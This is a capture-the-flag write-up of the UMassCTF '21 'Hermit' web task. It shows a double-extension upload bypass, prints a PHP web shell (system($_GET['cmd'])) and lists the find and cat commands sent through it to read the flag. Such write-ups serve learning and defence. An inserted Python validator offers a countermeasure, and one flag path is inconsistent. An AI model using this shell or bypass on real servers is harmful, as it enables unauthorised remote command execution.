UMassCTF '21 Writeup - Hermit
UMassCTF Hermit is an easy web CTF task. Reading the description, we get an IP to connect to.
This is what the website looks like:
There are a few things I've noticed right away. The first one being that we have to somehow upload a file that will give us a shell on the server or something similar. But the problem is that you can only upload images. Last but not least, when I test-uploaded an image, I noticed the website is written in PHP.
Since I hadn't done such a CTF task before, I began my research.
My guess was to trick the uploader by giving it what looks like an image but is actually a PHP file, which will then somehow get executed. This is quite possible if the site only checks the last file extension.
So I created a file 'shell.php'. This file only contains an echo call to prove that it is being executed.
If you're using Linux, you can use the mv command to turn this file into a "jpg" file by typing
mv shell.php shell.php.jpg
See what we did there? Since it can't convert the file itself, it just appends the .jpg file extension to the name.
Let's upload this image.
It got successfully uploaded and we can take a look at this image.
EXECUTED!
Quick recap. We bypassed the file extension "checker" and successfully executed shell.php.
What to do now ..? Exploit!
Exploit
I've created another shell.php, but this time the content is malicious.
In order to access the filesystem of this server, we have to somehow execute commands remotely.
One way is by using PHP's system() function.
What is this function going to do?
system() is just like the C version of the function in that it executes the given command and outputs the result.
Great! So our payload will look as follows:
<?php
system($_GET['cmd']);
?>
Pretty simple right? So what is going on?
We know system() executes any given command and outputs the result. By using $_GET we create a GET request parameter for this website. When we call this GET parameter with our desired command, its output is printed right on the website.
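The extension bypass above (shell.php.jpg passes a check that only looks at the trailing extension) and the system($_GET['cmd']) payload are both caught by a stricter upload validator. The following Python is an added illustration of such a check, not the challenge's code; the sample JPEG header and the PHP payload are constructed inline.

```python
import hashlib
import re
from typing import Optional

# Allowed single extensions and the magic bytes each one must start with.
ALLOWED_EXT = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Whole basename must be 'name.ext' with exactly one dot: 'shell.php.jpg' cannot match.
SAFE_NAME = re.compile(r"^[a-z0-9_-]+\.(jpg|png|gif)$")

# Constructed samples: a minimal JPEG header and the writeup's PHP payload.
REAL_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"


def weak_check(filename: str) -> bool:
    """The kind of check the writeup bypassed: only the trailing extension is inspected."""
    return filename.lower().endswith((".jpg", ".png", ".gif"))


def strict_check(filename: str, data: bytes) -> bool:
    """Accept only a single allowed extension AND content whose magic bytes match it."""
    m = SAFE_NAME.match(filename.lower())
    if not m:
        return False            # double extensions, odd characters, wrong case -> rejected
    return data.startswith(ALLOWED_EXT[m.group(1)])   # renamed PHP text fails here


def stored_name(filename: str, data: bytes) -> Optional[str]:
    """Server-chosen storage name (never the user's), or None when the upload is rejected."""
    if not strict_check(filename, data):
        return None
    ext = filename.lower().rsplit(".", 1)[1]
    return f"{hashlib.sha256(data).hexdigest()[:16]}.{ext}"
```

Storing the file under a server-chosen name, outside the web root, also removes the reason the renamed shell was ever reachable as executable code.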
And what command do we want to execute?
Well, there are many commands we could execute in order to achieve our goal (getting the flag).
Tell us how you got that flag!
Okay. Let's get back to the front page of this site and upload our newly created exploit. (Don't forget to rename it to an image file first!)
Once it has been uploaded successfully, navigating to the newly created URL will print an error, since we didn't supply any command in our parameter.
Since we don't know where the flag file is, we somehow have to search for it.
To get the flag we have to extend our current url by simply adding
&cmd=find / -name '*flag.txt'
This outputs: "/home/hermit/flag.txt /home/hermit/flag/userflag.txt"
Now the last step is to cat out the flag.
&cmd=cat /home/hermit/userflag.txt
and we got the flag!
UMASS{a_picture_paints_a_thousand_shells}
Great post, easy to understand for me, who never did a CTF so far. Keep good stuff like this comin'!
Thank you, I appreciate it!